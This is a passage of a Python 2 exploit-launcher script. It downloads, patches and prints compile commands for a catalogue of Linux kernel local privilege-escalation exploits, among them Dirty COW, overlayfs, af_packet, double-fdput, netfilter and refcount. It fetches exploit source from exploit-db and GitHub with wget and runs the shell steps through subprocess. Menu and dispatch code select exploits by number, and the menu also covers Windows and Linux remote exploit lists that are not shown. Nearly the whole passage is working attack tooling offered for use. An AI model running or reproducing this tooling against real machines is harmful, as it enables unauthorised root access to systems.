    ('Fixing...',"cp dirtycow_64.c dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/\/* 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 177;/unsigned int sc_len = 177; *\//g' dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/*\/ 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 136;/unsigned int sc_len = 136;\/*/g' dirtycow_32.c"),
678
    ('Compile with:','echo "gcc -o dirtycow_64 dirtycow_64.c -pthread"; echo "gcc -o dirtycow_32 dirtycow_32.c -pthread"')
679
  ]
680
  run(commands)
681
682
def msr():
683
  commands = [
684
    ('Downloading...','wget https://www.exploit-db.com/download/27297 -O msr_expl.c'),
685
    ('Compile with:','echo "gcc -o msr_expl msr_expl.c"')
686
  ]
687
  run(commands)
688
689
def perf_swevent_init():
690
  commands = [
691
    ('Downloading...','wget https://www.exploit-db.com/download/26131 -O perf.c'),
692
    ('Compile with:','echo "gcc -o perf perf.c"')
693
  ]
694
  run(commands)
695
696
def overlayfs_2():
697
  commands = [
698
    ('Downloading...','wget https://www.exploit-db.com/download/39166 -O overlayfs.c'),
699
    ('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
700
  ]
701
  run(commands)
702
703
def overlayfs_3():
704
  commands = [
705
    ('Downloading...','wget https://www.exploit-db.com/download/39230 -O overlayfs.c'),
706
    ('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
707
  ]
708
  run(commands)
709
710
def af_packet():
711
  commands = [
712
    ('Downloading...','wget https://www.exploit-db.com/download/40871 -O af_packet.c'),
713
    ('Compile with: ','echo "gcc -o af_packet af_packet.c -lpthread"')
714
  ]
715
  run(commands)
716
717
def double_fdput():
718
  commands = [
719
    ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip -O double_fdput.zip'),
720
    ('Unpacking...','unzip double_fdput.zip; cd 39772; tar xvf exploit.tar;'),
721
    ('Compile with: ','echo "cd 39772/ebpf_mapfd_doubleput_exploit; ./compile.sh"'),
722
    ('Run ./doubleput','')
723
  ]
724
  run(commands)
725
726
def netfilter():
727
  commands = [
728
    ('Downloading...','wget https://www.exploit-db.com/download/40049 -O netfilter.c'),
729
    ('Fixing...','tail -n 50 netfilter.c > pwn.c; head -n 213 netfilter.c > intermediate.c; tail -n 208 intermediate.c > decr.c'),
730
    ('Compile with:','echo "gcc -o decr decr.c -m32 -O2; gcc pwn.c -O2 -o pwn"'),
731
    ('Run decr, then pwn',''),
732
    ('Cleaning up...','rm netfilter.c intermediate.c')
733
  ]
734
  run(commands)
735
736
def refcount():
737
  commands = [
738
    ('Downloading...','wget https://www.exploit-db.com/download/39277 -O refcount.c'),
739
    ('Compile with:','echo "gcc -o refcount refcount.c -lkeyutils -Wall"')
740
  ]
741
  run(commands)
742
743
exploits_linux_local = [
744
  ("linux-exploit-suggester"    ,   linux_exploit_suggester),
745
  ("unix_privesc_check"     ,   unix_privesc_check),
746
  ("kernel 2.4.x / 2.6.x (sock_sendpage 1)"   ,   sendpage_1),
747
  ("kernel 2.4 / 2.6 (sock_sendpage 2)" ,   sendpage_2),
748
  ("kernel < 2.6.22 (ftruncate)"    ,   ftruncate),
749
  ("kernel < 2.6.34 (cap_sys_admin)"    ,   cap_sys_admin),
750
  ("kernel 2.6.27 < 2.6.36 (compat)"    ,   compat),
751
  ("kernel < 2.6.36-rc1 (can bcm)"  ,   can_bcm),
752
  ("kernel <= 2.6.36-rc8 (rds protocol)"   , rdsProtocol),
753
  ("*kernel < 2.6.36.2 (half nelson)"    ,   halfNelson),
754
  ("*kernel <= 2.6.37 (full nelson)"    ,   fullNelson),
755
  ("kernel 2.6 (udev)"  ,   udev),
756
  ("kernel 3.13 (sgid)" ,   sgid),
757
  ("kernel 3.13.0 < 3.19 (overlayfs 1)" ,   overlayfs_1),
758
  ("kernel 3.14.5 (libfutex)"   ,   libfutex),
759
  ("kernel 2.6.39 <= 3.2.2 (mempodipper)"   ,   mempodipper),
760
  ("*kernel 2.6.28 / 3.0 (alpha-omega)"  ,   alpha_omega),
761
  ("kernel 2.6.22 < 3.9 (Dirty Cow)"  ,   dirtycow),
762
  ("kernel 3.7.6 (msr)" ,   msr),
763
  ("*kernel < 3.8.9 (perf_swevent_init)" ,   perf_swevent_init),
764
  ("kernel <= 4.3.3 (overlayfs 2)"    ,   overlayfs_2),
765
  ("kernel 4.3.3 (overlayfs 3)"   ,   overlayfs_3),
766
  ("kernel 4.4.0 (af_packet)"   ,   af_packet),
767
  ("kernel 4.4.x (double-fdput)"   ,   double_fdput),
768
  ("kernel 4.4.0-21 (netfilter)"    ,   netfilter),
769
  ("*kernel 4.4.1 (refcount)"    ,   refcount)
770
]
771
772
# ------------------------------------
773
# UTILITY
774
# ------------------------------------
775
776
def endpoints(i):
777
  try:
778
    i = int(i)
779
  except ValueError:
780
    return 0
781
  if i <= 0:
782
    return 0
783
  elif i == 1:
784
    return len(exploits_windows_remote)
785
  elif i == 2:
786
    return len(exploits_windows_remote) + len(exploits_windows_local)
787
  elif i == 3:
788
    return len(exploits_windows_remote) + len(exploits_windows_local) + len(exploits_linux_remote)
789
  elif i >= 4:
790
    return len(exploits_windows_remote) + len(exploits_windows_local) + len(exploits_linux_remote) + len(exploits_linux_local)
791
792
def usage():
793
  print "USAGE: %s <exploit id>" % sys.argv[0]
794
  print "\nWindows Remote Exploits:"
795
  for i in range(endpoints(0), endpoints(1)):
796
    print "%i: %s" % (i, exploits_windows_remote[i-endpoints(0)][0])
797
  print "\nWindows Local Exploits:"
798
  for i in range(endpoints(1), endpoints(2)):
799
    print "%i: %s" % (i, exploits_windows_local[i-endpoints(1)][0])
800
  print "\nLinux Remote Exploits:"
801
  for i in range(endpoints(2), endpoints(3)):
802
    print "%i: %s" % (i, exploits_linux_remote[i-endpoints(2)][0])
803
  print "\nLinux Local Exploits:"
804
  for i in range(endpoints(3), endpoints(4)):
805
    print "%i: %s" % (i, exploits_linux_local[i-endpoints(3)][0])
806
807
def select(i):
808
  if i < 0 or i >= endpoints(4):
809
    return False
810
  
811
  if i < endpoints(1):
812
    printStep("Constructing %s" % exploits_windows_remote[i-endpoints(0)][0])
813
    exploits_windows_remote[i-endpoints(0)][1]()
814
  elif i < endpoints(2):
815
    printStep("Constructing %s" % exploits_windows_local[i-endpoints(1)][0])
816
    exploits_windows_local[i-endpoints(1)][1]()
817
  elif i < endpoints(3):
818
    printStep("Constructing %s" % exploits_linux_remote[i-endpoints(2)][0])
819
    exploits_linux_remote[i-endpoints(2)][1]()
820
  elif i < endpoints(4):
821
    printStep("Constructing %s" % exploits_linux_local[i-endpoints(3)][0])
822
    exploits_linux_local[i-endpoints(3)][1]()
823
  return True
824
825
def run(commands):
826
  try:
827
    for c in commands:
828
      printStep(c[0])
829
      subprocess.check_call(c[1], shell=True)
830
  except subprocess.CalledProcessError:
831
    printErr("Command failed")
832
    return False
833
  except OSError:
834
    printErr("Command failed")
835
    return False
836
  return True
837
838
def printStep(s):
839
  print "%s [*] %s %s" % ('\033[93m', s, '\033[0m')
840
841
def printErr(s):
842
  print "%s [!] %s %s" % ('\033[91m', s, '\033[0m')
843
844
def printGood(s):
845
  print "%s [+] %s %s" % ('\033[92m', s, '\033[0m')
846
847
# ------------------------------------
848
# MAIN
849
# ------------------------------------
850
851
if len(sys.argv) <> 2:
852
  usage()
853
  sys.exit()
854
855
try:
856
  success = select(int(sys.argv[1]))
857
  if not success:
858
    print "[-] Invalid selection: %s" % sys.argv[1]
859
    usage()
860
except ValueError:
861
  print "[-] Invalid selection: %s" % sys.argv[1]
862
  usage()